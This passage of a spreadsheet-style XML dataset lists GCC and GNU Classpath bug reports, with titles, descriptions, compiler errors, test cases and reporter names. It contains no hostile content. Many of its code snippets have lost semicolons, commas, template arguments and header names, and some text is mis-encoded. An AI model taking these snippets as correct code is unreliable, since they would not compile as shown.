(insn 7698 1165 1168 29 (nil) (set (reg:SI 24 %r24)
        (reg:SI 88 SAR [427])) 37 {*pa.md:2265} (nil)
    (nil))
jfs_xtree.c:2351: internal compiler error: in reload_cse_simplify_operands at
reload1.c:8345
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I will attached jfs_xtree.[is] asap.
Thanks in advance for your attention
    Joel</t>
  </si>
  <si>
    <t>soete.joel</t>
  </si>
  <si>
    <t>GCC-59543</t>
  </si>
  <si>
    <t>[4.9 Regression] lto1: fatal error: Cgraph edge statement index out of range</t>
  </si>
  <si>
    <t>During Firefox build I get:
markus@x4 shell % /var/tmp/gcc_test/usr/local/bin/g++ -flto=4 -o foofo -O2 Unified_cpp_shell0.o ../libjs_static.a
In member function â€˜initâ€™:
lto1: fatal error: Cgraph edge statement index out of range 9 &lt; 10
compilation terminated.
make: *** [/tmp/cczchbUW.ltrans21.ltrans.o] Error 1
make: *** Waiting for unfinished jobs....
lto-wrapper: make returned 2 exit status
/usr/bin/ld: lto-wrapper failed
collect2: error: ld returned 1 exit status
markus@x4 shell % /var/tmp/gcc_test/usr/local/bin/g++ -flto=4 -O2 Unified_cpp_shell0.o ../libjs_static.a -rdynamic
In member function â€˜extractBetweenâ€™:
lto1: fatal error: Cgraph edge statement index out of range 25 &lt; 50
compilation terminated.
make: *** [/tmp/cchXDtH7.ltrans22.ltrans.o] Error 1
Here's a testcase:
 tmp % wget trippelsdorf.de/cceI2Nud.ltrans22.o.bz2
 tmp % bzip2 -d cceI2Nud.ltrans22.o.bz2
 tmp % g++ -xlto -fltrans cceI2Nud.ltrans22.o
In member function â€˜extractBetweenâ€™:
lto1: fatal error: Cgraph edge statement index out of range
compilation terminated.</t>
  </si>
  <si>
    <t>CLASSPATH-27605</t>
  </si>
  <si>
    <t>Choosing a directory in the JFileChooser's JComboBox doesn't seem to do anything</t>
  </si>
  <si>
    <t>The top part of the JFileChooser contains a JComboBox which allows to choose a directory from / to the current one. It seems to be broken in the CVS version and doesn't do anything when the user clicks on one directory.</t>
  </si>
  <si>
    <t>yvan.norsa</t>
  </si>
  <si>
    <t>GCC-23837</t>
  </si>
  <si>
    <t>[4.0 regression] Wrong code with REG_NO_CONFLICT notes (caused by combine)</t>
  </si>
  <si>
    <t>[forwarded from http://bugs.debian.org/326026]
falk@paer:~% cat test.c
void abort(void)
unsigned long long f(unsigned long long x) {
    return ((x &gt;&gt; 8) | (x &gt; 48) | (x &gt; 1)
}
int main() {
    volatile unsigned long long v = 0x1122334455667788ULL
    if (f(v) != 0xb3c46ef7196e4c91ULL)
        abort()
    return 0
}
falk@paer:~% gcc-4.0 -O1 -fno-schedule-insns test.c &amp;&amp; ./a.out
falk@paer:~% gcc-4.0 -O1 -fschedule-insns test.c &amp;&amp; ./a.out   
zsh: abort (core dumped)  ./a.out
Reproduced with 4.0.2 20050821 on hppa-linux and with 4.1.0 20050705 on
i686-linux.</t>
  </si>
  <si>
    <t>GCC-56132</t>
  </si>
  <si>
    <t>Lengths incorrect on assignment to an allocatable character scalar.</t>
  </si>
  <si>
    <t>Created attachment 29296
Code demonstrating the problem
When I run the attached program with gfortran (4.7.2) the length appears to be that of the previous assignment e.g.:
./a.out 
String :_jjjj
           0 
           0 
String :_ssss
           0 
           4 ssss
String :_77
           4 ssss
           4 77  
String :_why does this happen
           4 77  
           2 wh</t>
  </si>
  <si>
    <t>jtappin</t>
  </si>
  <si>
    <t>GCC-81548</t>
  </si>
  <si>
    <t>make distclean does not clean all of gotools/</t>
  </si>
  <si>
    <t>make distclean does not rmdir gotools because the files
gotools.log.sent gotools.sum.sent are still there (after having
run contrib/test_summary first).</t>
  </si>
  <si>
    <t>GCC-46778</t>
  </si>
  <si>
    <t>More SFINAE issues?</t>
  </si>
  <si>
    <t>I'm working on updating std::is_constructible and I see behavior I don't understand for the current implementation. Shouldn't the below just compile??? (a more refined version of the code using std::declval() etc as in  doesn't change anything)
template
  class is_constructible_mini
  {
    typedef char __one
    typedef struct { char __arr[2] } __two
    template
      static decltype(_Tp1(_Args1()...) __one())
      __test(int)
    template
      static __two __test(...)
  public:
    static const bool value = sizeof(__test(0)) == 1
  }
int t1[is_constructible_mini&lt;int
int t2[is_constructible_mini&lt;const int
int t3[is_constructible_mini&lt;int // Ok
int t4[is_constructible_mini&lt;const int</t>
  </si>
  <si>
    <t>GCC-29737</t>
  </si>
  <si>
    <t>make check fixinclude test FAILURES</t>
  </si>
  <si>
    <t>Latest CVS builds fine. Attempt to make check yields:
gmake[1]: Entering directory `/usr/home/mckelvey/software/gcc-obj'
gmake[2]: Entering directory `/usr/home/mckelvey/software/gcc-obj/fixincludes'
autogen -T ../../gcc/fixincludes/check.tpl ../../gcc/fixincludes/inclhack.def
/bin/sh ./check.sh ../../gcc/fixincludes/tests/base
Fixed:  testing.h
Fixed:  testing.h
Fixed:  ansi/math.h
...
Fixed:  obstack.h
Fixed:  pixrect/memvar.h
sed: -e expression #1 char 48: Unexpected ''
Fixed:  regex.h
...
Fixed:  Xm/BaseClassI.h
Fixed:  Xm/Traversal.h
Missing header fix:  pthread.h
There were fixinclude test FAILURES
gmake[2]: *** [check] Error 1
gmake[2]: Leaving directory `/usr/home/mckelvey/software/gcc-obj/fixincludes'
gmake[1]: *** [check-fixincludes] Error 2
gmake[1]: Leaving directory `/usr/home/mckelvey/software/gcc-obj'
gmake: *** [do-check] Error 2
Configured:
alpha1:gcc-obj&gt;alias CONFIGURECVS
alias CONFIGURECVS='../gcc/configure --verbose --enable-languages=c++ --disable-linux-futex --disable-nls --disable-tls &gt;clog 2&gt;&amp;1 &amp;'
Built:
alias BUILD='nice gmake CFLAGS='\'''\'' BOOT_CFLAGS='\'''\'' LIBCFLAGS='\''-g'\'' LIBCXXFLAGS='\''-g'\'' bootstrap &gt;log 2&gt;&amp;1 &amp;'
alpha1:gcc-obj&gt;uname -a
Linux alpha1 2.4.9-40 #1 Mon Sep 23 08:14:02 EDT 2002 alpha unknown</t>
  </si>
  <si>
    <t>mckelvey</t>
  </si>
  <si>
    <t>GCC-69524</t>
  </si>
  <si>
    <t>[6 Regression] [F08] Compiler segfaults on module subroutine</t>
  </si>
  <si>
    <t>Created attachment 37501
Reproducer
Attached testcase produces ICE while compiling w/ recent trunk:
$ ./build-x86_64-linux/gcc/gfortran -B./build-x86_64-linux/gcc -S 2.f08
f951: internal compiler error: in build_function_decl at fortran/trans-decl.c:2065
0x88c1df build_function_decl
        /export/users/kyukhin/gcc/git/gcc2/gcc/fortran/trans-decl.c:2065
0x88ec53 gfc_create_function_decl(gfc_namespace* bool)
        /export/users/kyukhin/gcc/git/gcc2/gcc/fortran/trans-decl.c:2758
0x86361d gfc_generate_module_code(gfc_namespace*)
        /export/users/kyukhin/gcc/git/gcc2/gcc/fortran/trans.c:2043
0x7f9d19 translate_all_program_units
        /export/users/kyukhin/gcc/git/gcc2/gcc/fortran/parse.c:5599
0x7fa3f7 gfc_parse_file()
        /export/users/kyukhin/gcc/git/gcc2/gcc/fortran/parse.c:5818
0x84c839 gfc_be_parse_file
        /export/users/kyukhin/gcc/git/gcc2/gcc/fortran/f95-lang.c:201
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-55973</t>
  </si>
  <si>
    <t>r195150 doesn't properly handle out of tree isl 0.11.1</t>
  </si>
  <si>
    <t>The commit...
Author: rguenth
Date: Mon Jan 14 15:01:13 2013
New Revision: 195150
URL: http://gcc.gnu.org/viewcvs?root=gcc&amp;view=rev&amp;rev=195150
Log:
2013-01-14  Richard Biener  
	* configure.ac (cloog/isl): Also allow ISL 0.11.x and CLooG 0.18.0.
	* configure: Re-generate
doesn't handle out of tree installations of isl 0.11.1 as config/isl.m4 needs to be taught how to handle revision numbers in the complete version number. The proposed patch in...
http://gcc.gnu.org/ml/gcc/2012-12/msg00195.html
does this. The current commit also has a stray instance of...
ISL_CHECK_VERSION(010)
in configure.ac and doesn't recognize that the current checks are still hard-coded to a specific version. So either isl 0.11 or 0.11.1 was be designated in configure.ac.</t>
  </si>
  <si>
    <t>CLASSPATH-24087</t>
  </si>
  <si>
    <t>TabbedPane problems</t>
  </si>
  <si>
    <t>Sometimes Tabs in TabbedPane do not show up</t>
  </si>
  <si>
    <t>GCC-20908</t>
  </si>
  <si>
    <t>[m68k-linux] libjava testsuite fails about 600 tests</t>
  </si>
  <si>
    <t>after finishing a CVS 4.0 20050326 bootstrap and testsuite run in real   
16653m49.206s the libjava testsuite fails about 600 tests with
Running /home/doko/4.0/gcc-4.0-4.0ds9/src/libjava/testsuite/libjava.cni/cni.exp ...
byte compile: /home/doko/4.0/gcc-4.0-4.0ds9/build/gcc/gcj
-B/home/doko/4.0/gcc-4.0-4.0ds9/build/gcc/ -B/usr/m68k-linux/bin/
-B/usr/m68k-linux/lib/ -isystem /usr/m68k-linux/include -isystem
/usr/m68k-linux/sys-include --encoding=UTF-8 -C
-I/home/doko/4.0/gcc-4.0-4.0ds9/build/m68k-linux/libjava/testsuite/../libgcj-4.0.0.jar
-g /home/doko/4.0/gcc-4.0-4.0ds9/src/libjava/testsuite/libjava.cni/PR9577.java
-d /home/doko/4.0/gcc-4.0-4.0ds9/build/m68k-linux/libjava/testsuite 2&gt;@ stdout
PASS: bytecompile
/home/doko/4.0/gcc-4.0-4.0ds9/src/libjava/testsuite/libjava.cni/PR9577.java
PR9577 PASS: PR9577 header generation
Executing on host: /home/doko/4.0/gcc-4.0-4.0ds9/build/gcc/xgcc
-B/home/doko/4.0/gcc-4.0-4.0ds9/build/gcc/  -I. -I..
-I/home/doko/4.0/gcc-4.0-4.0ds9/src/libjava/testsuite/.. -c  -o natPR9577.o
/home/doko/4.0/gcc-4.0-4.0ds9/src/libjava/testsuite/libjava.cni/natPR9577.cc   
(timeout = 600)
PASS: natPR9577.cc compilation
set_ld_library_path_env_vars:
ld_library_path=.:/home/doko/4.0/gcc-4.0-4.0ds9/build/m68k-linux/./libjava/.libs:/home/doko/4.0/gcc-4.0-4.0ds9/build/gcc
Executing on host:
/home/doko/4.0/gcc-4.0-4.0ds9/build/m68k-linux/libjava/testsuite/../libtool
--silent --tag=GCJ --mode=link /home/doko/4.0/gcc-4.0-4.0ds9/build/gcc/gcj
-B/home/doko/4.0/gcc-4.0-4.0ds9/build/gcc/ -B/usr/m68k-linux/bin/
-B/usr/m68k-linux/lib/ -isystem /usr/m68k-linux/include -isystem
/usr/m68k-linux/sys-include --encoding=UTF-8
-B/home/doko/4.0/gcc-4.0-4.0ds9/build/m68k-linux/libjava/testsuite/../
/home/doko/4.0/gcc-4.0-4.0ds9/src/libjava/testsuite/libjava.cni/PR9577.java
natPR9577.o   -no-install --main=PR9577 -g 
-L/home/doko/4.0/gcc-4.0-4.0ds9/build/m68k-linux/./libjava/.libs -lm   -o PR9577
   (timeout = 600)
PASS: linking PR9577
set_ld_library_path_env_vars:
ld_library_path=.:/home/doko/4.0/gcc-4.0-4.0ds9/build/m68k-linux/./libjava/.libs:/home/doko/4.0/gcc-4.0-4.0ds9/build/gcc
Setting LD_LIBRARY_PATH to
.:/home/doko/4.0/gcc-4.0-4.0ds9/build/m68k-linux/./libjava/.libs:/home/doko/4.0/gcc-4.0-4.0ds9/build/gcc:.:/home/doko/4.0/gcc-4.0-4.0ds9/build/m68k-linux/./libjava/.libs:/home/doko/4.0/gcc-4.0-4.0ds9/build/gcc:/home/doko/4.0/gcc-4.0-4.0ds9/build/gcc:/home/doko/4.0/gcc-4.0-4.0ds9/build/gcc/ada/rts
Exception during runtime initialization
java.lang.ExceptionInInitializerError
   &gt;
Caused by: java.lang.ArrayIndexOutOfBoundsException: -1065023565
   &gt;
FAIL: PR9577 run
UNTESTED: PR9577 output</t>
  </si>
  <si>
    <t>GCC-60995</t>
  </si>
  <si>
    <t>gccgo ignores .a files with /SYM64/ symbol table</t>
  </si>
  <si>
    <t>On platforms where ar generates .a files with a /SYM64/ symbol table (e.g. s390x) gccgo cannot extract Go export data from such files.  This is because import-archive.cc:Archive_file::interpret_header() does not recognize the special file name /SYM64/          and treats it as an extended name and fails with two error messages:
  error: .../libfoo.a: bad extended name index at 8
  error: .../libfoo.a exists but does not contain any Go export data
This is easy to fix by recognizing /SYM64/ as a symbol table by inserting something like this before the final else in interpret_header():
&gt;  else if (hdr-&gt;ar_name[1] == 'S' &amp;&amp; hdr-&gt;ar_name[2] == 'Y'
&gt;	   &amp;&amp; hdr-&gt;ar_name[3] == 'M' &amp;&amp; hdr-&gt;ar_name[4] == '6'
&gt;	   &amp;&amp; hdr-&gt;ar_name[5] == '4' &amp;&amp; hdr-&gt;ar_name[6] == '/'
&gt;	   &amp;&amp; hdr-&gt;ar_name[7] == ' '
&gt;	  )
&gt;    {
&gt;      // 64-bit symbol table.
&gt;      pname-&gt;clear()
&gt;    }
Note:  Same problem as this one: http://code.google.com/p/go/issues/detail?id=6383</t>
  </si>
  <si>
    <t>vogt</t>
  </si>
  <si>
    <t>GCC-43546</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: in assign_stack_local_1 at function.c:353 with -mpreferred-stack-boundary=2 -msseregparm</t>
  </si>
  <si>
    <t>Command line:
gcc -O1 -m32 -mpreferred-stack-boundary=2 -msseregparm -msse testcase.c
------ testcase.c ------
extern void bar(double)
void foo() { bar(1.0) }
------------------------
Tested revisions:
r157723 - crash
alpha20100318 - segfault (without checking)
r153685 - crash
4.4 r153668 - crash
4.4.3 4.3.4 4.2.4 4.1.2 (gentoo) - OK (without checking)
3.4.6 3.3.6 - doesn't know -msseregparm
Compiler output:
/mnt/svn/gcc-trunk/binary-157723-lto/bin/gcc -O1 -m32 -mpreferred-stack-boundary=2 -msseregparm -msse testcase.c
testcase.c: In function 'foo':
testcase.c:2:1: internal compiler error: in assign_stack_local_1 at function.c:353
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-53657</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] [C++11] pair(pair&amp;&amp;) move constructor is non-trivial</t>
  </si>
  <si>
    <t>As discussed in PR 53646 the std::pair move constructor is non-trivial and so causes an unfortunate ABI change where std::pair gets returned from functions by invisible reference instead of in registers.
Defaulting it makes it trivial but causes other problems:
      // XXX Defaulted?!? Breaks std::map!!!
      pair(pair&amp;&amp; __p)
      noexcept(__and_
                      is_nothrow_move_constructible&gt;::value)
      : first(std::forward(__p.first))
        second(std::forward(__p.second)) { }</t>
  </si>
  <si>
    <t>GCC-57471</t>
  </si>
  <si>
    <t>[4.9 Regression] Bizarre error for template parameter pack</t>
  </si>
  <si>
    <t>Created attachment 30226
Output of -v option and preprocessed source
GCC 4.9.0 20130526 rejects the following valid code.
//-----------------------------------------
struct A
{
  static constexpr bool value = true
}
template
struct B
{
  static_assert(A::value )
  static_assert(sizeof...(Types) == 0 )
}
//-----------------------------------------
The error message is
main.cpp:10:27: error: 'A::Types' has not been declared
   static_assert(sizeof...(Types) == 0 )
                           ^
The above code successfully compiles with 4.7.4 20130525 and 4.8.1 20130523.</t>
  </si>
  <si>
    <t>ai.azuma</t>
  </si>
  <si>
    <t>GCC-46160</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE with volatile structure and enum</t>
  </si>
  <si>
    <t>The following C++ code
void f(int)
void
g()
{
  struct S
  {
    enum E { A } 
  }
  S s
  volatile S *p = 
  f((int) p-&gt;A)
}
results in
gcc: internal compiler error: Segmentation fault (program cc1plus)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
with 4.5 and 4.6 but compiles fine with 4.4.</t>
  </si>
  <si>
    <t>GCC-54522</t>
  </si>
  <si>
    <t>Using g77 -O -fno-automatic reassignment of a variable in an if statement in a function triggers a compiler bug.</t>
  </si>
  <si>
    <t>C g77 bug found 9/7/2012.
C When command g77 -c -O -fno-automatic reasssignment_bug.for is
C used on the included code the following is produced:
C
C   reassignment_bug.for: In function `dum':
C   In file included from reassignment_bug.for:0:
C   reassignment_bug.for:7: internal compiler error: in gen_reg_rtx at
C   emit-rtl.c:819
C   Please submit a full bug report
C   with preprocessed source if appropriate.
C   See  for instructions.
C
C The code is non-sensical but valid and should not crash the compiler.
C The logic was found in a larger more complex piece of code where the
C cause was hard to find.
C
C Compiler version from g77 -v:
C Reading specs from /usr/lib/gcc/x86_64-redhat-linux/3.4.6/specs
C Configured with: ../configure --prefix=/usr --mandir=/usr/share/man
C --infodir=/usr/share/info --enable-shared --enable-threads=posix
C --disable-checking --with-system-zlib --enable-__cxa_atexit
C --disable-libunwind-exceptions --enable-languages=cc++f77
C --disable-libgcj --host=x86_64-redhat-linux
C Thread model: posix
C gcc version 3.4.6 20060404 (Red Hat 3.4.6-19.el6)
C
      FUNCTION DUM(A)
      B=A
      IF (B.EQ.1) B=A
      DUM=B
      RETURN
      END</t>
  </si>
  <si>
    <t>aap1</t>
  </si>
  <si>
    <t>GCC-3077</t>
  </si>
  <si>
    <t>ICE in gen_lowpart at emit-rtl.c:1110</t>
  </si>
  <si>
    <t>I'm trying to make a cross-compiler to mips-elf plataform. 
First I made the local compiler (which works fine) and them the local compiler failed to compile gcc as a cross-compiler reporting the internal compiler error:
../../../src/gas/itbl-ops.c: In function `apply_range':
../../../src/gas/itbl-ops.c:695: Internal compiler error in gen_lowpart at emit-rtl.c:1110
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.1 20010607
Environment:
System: Linux lampiao.lsc.ic.unicamp.br 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../../gcc/configure --prefix=/home/rjazeved/compiler/local/build --with-gnu-as --with-gnu-ld
How-To-Repeat:
run the following command line while compiling gcc
gcc -v -save-temps -DHAVE_CONFIG_H -I. -I../../../src/gas -I. -D_GNU_SOURCE -I. -I../../../src/gas -I../bfd -I../../../src/gas/config -I../../../src/gas/../include -I../../../src/gas/.. -I../../../src/gas/../bfd -I../../../src/gas/../intl -I../intl -DLOCALEDIR=\/home/rjazeved/compiler/cross/build/share/locale\   -W -Wall -g -O2 -c ../../../src/gas/itbl-ops.c</t>
  </si>
  <si>
    <t>rjazevedo</t>
  </si>
  <si>
    <t>GCC-38250</t>
  </si>
  <si>
    <t>ICE with -O2 -ftree-loop-distribution</t>
  </si>
  <si>
    <t>GCC ICEs on folowing code with options -O2 -ftree-loop-distribution
typedef long unsigned int size_t
typedef struct   {
      long dat[2]
} gsl_complex_long_double
typedef struct {
    size_t size
    size_t stride
    long *data
} gsl_vector_complex_long_double
void gsl_vector_complex_long_double_set_zero (gsl_vector_complex_long_double * v) 
{
    long * const data = v-&gt;data
    const size_t n = v-&gt;size
    const size_t stride = v-&gt;stride
    const gsl_complex_long_double zero = { { 00} } 
    size_t i
    for (i = 0 i &lt; n i++)     
        *(gsl_complex_long_double *) (data + 2 * i * stride) = zero
}
as
prx.c: In function â€˜gsl_vector_complex_long_double_set_zeroâ€™:
prx.c:10: internal compiler error: in fold_binary at fold-const.c:9308
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --prefix=/abuild/tbily/install/ --enable-checks --enable-bootstrap --disable-multilib
Thread model: posix
gcc version 4.4.0 20081118 (experimental) (GCC)</t>
  </si>
  <si>
    <t>tomby</t>
  </si>
  <si>
    <t>GCC-4416</t>
  </si>
  <si>
    <t>documentation says -fstd= but should say -std=</t>
  </si>
  <si>
    <t>'info gcc' says -fstd= in a few places but cc1 wants -std=
Release:
2.95.4
Environment:
debian 2.4 ppc</t>
  </si>
  <si>
    <t>GCC-57642</t>
  </si>
  <si>
    <t>vectorizer not working with function templates</t>
  </si>
  <si>
    <t>Hi the following simple loop doesn't vectorize in GCC 4.8.1 but does with 4.3.2. It does vectorize if I make DoIt a regular function instead of a templated function.
#include 
#include 
#include 
#include 
#include 
#include 
class SqrtFunc
{
public:
  float operator()(float x)
  {
    return (((3.02f * x) + 1.5f) * x - 2.1f) * x + 1.5f
  }
}
template 
void DoIt(float *data int size Functor functor)
{
  for (int i = 0 i &lt; size ++i)
  {
    data[i] = functor(data[i])
  }
}
int main()
{
  float data[2048]
  SqrtFunc functor
  DoIt(data sizeof(data) functor)
  return 0
}</t>
  </si>
  <si>
    <t>yzhang1985</t>
  </si>
  <si>
    <t>GCC-27499</t>
  </si>
  <si>
    <t>ICE with unsigned iteration variable and -fopenmp</t>
  </si>
  <si>
    <t>Now that the really baad OpenMP bugs seem to be fixed (thanhsk for that!) I have a hopefully easy one: I get an ICE (svn from today) for the following C code (and the C++ equivalent as well):
void f()
{
        unsigned int i
        int dummy
#pragma omp parallel for
        for (i = 0 i &lt; 5 ++i)
                dummy = i
}
LANG=C gcc-4.2 -c -fopenmp -o gcc-bug-signed.o gcc-bug-signed.c
gcc-bug-signed.c: In function 'f':
gcc-bug-signed.c:6: warning: iteration variable 'i' is unsigned
gcc-bug-signed.c:6: internal compiler error: in gimplify_omp_for at gimplify.c:4753
FYI icc 8.1 flags the unsigned variable as error.</t>
  </si>
  <si>
    <t>Georg.Baum</t>
  </si>
  <si>
    <t>GCC-54386</t>
  </si>
  <si>
    <t>[4.8 Regression] Unaligned mem load wrongly generated for inlined inline/static function</t>
  </si>
  <si>
    <t>I've tested this only on SH but it might be a generic case.
The following code snippet... 
static __inline__ int
__testbit (unsigned long nr unsigned long* a)
{
  return (*a 
}
typedef struct page2
{
 void* x[2]
 unsigned long flags
 void* a
 void* b
} page2_t
void activate_page3(struct page2 * page)
{
 if ( ! __testbit (7 &amp;(page-&gt;flags)) )
  {
    page-&gt;a = 0
    page-&gt;b = 0
 }
}
...compiled with -O2 expands to the following RTL:
void activate_page3(page2*) (struct page2 * page)
{
  long unsigned int _4
  long unsigned int _7
   basic block 2 loop depth 0
    pred:       ENTRY
  _4 = MEM[(long unsigned int *)page_2(D) + 8B]
  _7 = _4 
  if (_7 == 0)
    goto 
  else
    goto 
    succ:       3
                4
   basic block 3 loop depth 0
    pred:       2
  page_2(D)-&gt;a = 0B
  page_2(D)-&gt;b = 0B
    succ:       4
   basic block 4 loop depth 0
    pred:       2
                3
  return
    succ:       EXIT
}
 Generating RTL for gimple basic block 2
 if (_7 == 0)
(insn 7 5 8 (set (reg:QI 165)
        (mem:QI (plus:SI (reg/v/f:SI 162 [ page ])
                (const_int 8 [0x8])) [0+0 S1 A8])) sh_tmp.cpp:699 -1
     (nil))
(insn 8 7 9 (set (reg:SI 163)
        (zero_extend:SI (reg:QI 165))) sh_tmp.cpp:699 -1
     (nil))
(insn 9 8 11 (set (reg:SI 166)
        (ashift:SI (reg:SI 163)
            (const_int 24 [0x18]))) sh_tmp.cpp:699 -1
     (nil))
(insn 11 9 12 (set (reg:QI 169)
        (mem:QI (plus:SI (reg/v/f:SI 162 [ page ])
                (const_int 9 [0x9])) [0+1 S1 A8])) sh_tmp.cpp:699 -1
     (nil))
[...]
For some reason the SI mem access is converted to four QI mem accesses which looks like an unaligned load.  Since only one QI part is needed of the QI loads disappear after the combine pass has done its thing.
On the other hand removing 'static' and 'inline' for the function __testbit like:
int
__testbit (unsigned long nr unsigned long* a)
would still do the inlining (as expected) and expand to (aligned) SI mem load:
void activate_page3(page2*) (struct page2 * page)
{
  long unsigned int _6
  long unsigned int _7
   basic block 2 loop depth 0
    pred:       ENTRY
  _6 = MEM[(long unsigned int *)page_2(D) + 8B]
  _7 = _6 
  if (_7 == 0)
    goto 
  else
    goto 
    succ:       3
                4
   basic block 3 loop depth 0
    pred:       2
  page_2(D)-&gt;a = 0B
  page_2(D)-&gt;b = 0B
    succ:       4
   basic block 4 loop depth 0
    pred:       2
                3
  return
    succ:       EXIT
}
 Generating RTL for gimple basic block 2
 if (_7 == 0)
(insn 6 5 7 (set (reg:SI 164)
        (mem:SI (plus:SI (reg/v/f:SI 162 [ page ])
                (const_int 8 [0x8])) [2 MEM[(long unsigned int *)page_2(D) + 8B]+0 S4 A32])) swap.i:20 -1
     (nil))
(insn 7 6 8 (set (reg:SI 163 [ D.1692 ])
        (and:SI (reg:SI 164)
            (const_int 128 [0x80]))) swap.i:20 -1
     (nil))
The unaligned loads are generated if the __testbit function is 
- 'static'
- 'inline'
- 'static inline'
sh-elf-gcc -v
Using built-in specs.
COLLECT_GCC=sh-elf-gcc
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/sh-elf/4.8.0/lto-wrapper
Target: sh-elf
Configured with: ../gcc-trunk-van/configure --target=sh-elf --prefix=/usr/local --enable-languages=cc++ --enable-multilib --disable-libssp --disable-nls --disable-werror --enable-lto --with-newlib --with-gnu-as --with-gnu-ld --with-system-zlib
Thread model: single
gcc version 4.8.0 20120827 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-4832</t>
  </si>
  <si>
    <t>const of typedef'ed pointers are not respected</t>
  </si>
  <si>
    <t>I have a typedef'ed pointer type (say: typedef void* pvoid) when I use it
in the declaration of a function as
void bar(const pvoid a)
The compiler seems to think that bar is declared as:
void bar(pvoid a)
I can reproduce the bug with any pointer type gcc 3.0.1 and gcc 2.96 says:
 test.c: In function `void foo (const void *)':
test.c:4: cannot convert `const void *' to `void *' for argument `1' to 
`bar (void *)'
Release:
unknown
Environment:
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --host=i386-redhat-linux
Thread model: posix
gcc version 3.0.1 20010807 (Red Hat Linux 7.1 3.0-6)</t>
  </si>
  <si>
    <t>cuenca</t>
  </si>
  <si>
    <t>GCC-2547</t>
  </si>
  <si>
    <t>GCC generate wrong size struct</t>
  </si>
  <si>
    <t>The struct View in the union messagem are created with
a size bigger than it was suppose to have. It's suppose to
have 18 bytes but are created with 20. The two adicional
bytes are inserted in the middle of the struct so when I
have to use the others members of the union the information
becomes useless.
Some debugging that I did:
[fabio@firewall muo]$ gcc -Wall -O0 -o dec2 -g dec2.c
dec2.c: In function `main':
dec2.c:229: warning: implicit declaration of function `strcpy'
[fabio@firewall muo]$ gdb dec2
GNU gdb 5.0
Copyright 2000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386-redhat-linux...
(gdb) break 230
Breakpoint 1 at 0x8048477: file dec2.c line 230.
(gdb) run
Starting program: /home/fabio/muo/dec2
Breakpoint 1 main () at dec2.c:230
230         return 0
(gdb) ptype mensagem
type = union serverMsgs {
    unsigned char buffer[1024]
    struct {
        unsigned int m_UID
        unsigned int m_unk_5_8
        short unsigned int m_id
        short unsigned int m_x
        short unsigned int m_y
        short unsigned int m_z
        unsigned char m_dir
        unsigned char m_unk_18
        unsigned int m_unk_19_22
        short unsigned int m_unk_23_24
        short unsigned int m_unk_25_26
        short unsigned int m_mode
        short unsigned int m_unk_29_30
        unsigned char m_unk31[6]
    } Start
    struct {
        unsigned char m_Arg
    } Pause
    struct {
        unsigned char m_warmode
        unsigned char m_unk2[3]
    } War
    struct {
        unsigned char m_level
    } Light
    struct {
        unsigned char m_type
        short unsigned int m_ext
    } Weather
    struct {
        unsigned int m_UID
        short unsigned int m_id
        unsigned char m_zero7
        short unsigned int m_color
        unsigned char m_mode
        short unsigned int m_x
        short unsigned int m_y
        short unsigned int m_zero15
        unsigned char m_dir
        unsigned char m_z
    } View
    struct {
        short unsigned int m_len
        unsigned int m_UID
        short unsigned int m_id
        short unsigned int m_x
        short unsigned int m_y
        unsigned char m_z
        unsigned char m_dir
        short unsigned int m_color
        unsigned char m_mode
---Type  to continue or q  to quit---q
Quit
(gdb) p /x mensagem.buffer
$1 = {0x61 0x62 0x63 0x64 0x65 0x66 0x67 0x68 0x69 0x6a 0x6b 0x6c 0x6d 0x6e 0x6f 0x70 0x71 0x72 0x73
  0x74 0x75 0x76 0x78 0x79 0x7a 0x77 0x0 }
(gdb) p /x mensagem.View
$2 = {m_UID = 0x64636261 m_id = 0x6665 m_zero7 = 0x67 m_color = 0x6a69 m_mode = 0x6b m_x = 0x6e6d m_y = 0x706f
  m_zero15 = 0x7271 m_dir = 0x73 m_z = 0x74}
(gdb)
The struct seem ok but theres is two members hiding that gdb don't show
One get the 8th byte of mensagem.buffer
Other get the 12th byte of mensagem.buffer
Thanks
Fabio Urquiza
Release:
gcc2.96 egcs1.1.2 gcc3.0(from CodeSourcery's Online Test Compilation)
Environment:
Red Hat 7.0
Rpms:
gcc-2.96-69
glibc-2.1.92-14
compat-egcs-6.2-1.1.2.9
compat-glibc-6.2-2.1.3.2
How-To-Repeat:
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define MAX_NAME_SIZE    30        // imposed by client for protocol
#define START	0x1b
#define PAUSE	0x33
#define WAR	0x72
#define LIGHT	0x4f
#define WEATHER	0x65
#define VIEW	0x20
#define CHARS	0x78
#define REDRALL	0x55
#define TIME	0x5b
#define SOUND	0x54
#define CHATBLE	0xb9
#define SPEAK	0x1c
#define SCROLL	0xa6
#define PUT     0x1a
#define CHARMOVE    0x77
#define REMOVE  0x1D
#define CHARANI 0x6e
#define CONTADD 0x25
#define DRAGANIM    0x23
//#define 	0x
union serverMsgs {
  unsigned char buffer[1024]
  struct { // size = 37    // start up player
//    unsigned char  m_Cmd            // 0 = 0x1B
    unsigned int   m_UID            // 1-4
    unsigned int   m_unk_5_8        // 5-8 = 0
    unsigned short m_id            // 9-10
    unsigned short m_x            // 11-12
    unsigned short m_y            // 13-14
    unsigned short m_z            // 15-16
    unsigned char  m_dir            // 17
    unsigned char  m_unk_18        // 18
    unsigned int   m_unk_19_22    // 19-22
    unsigned short m_unk_23_24    // 23-14
    unsigned short m_unk_25_26    // 23-14
    unsigned short m_mode            // 27-28
    unsigned short m_unk_29_30    // 29-30
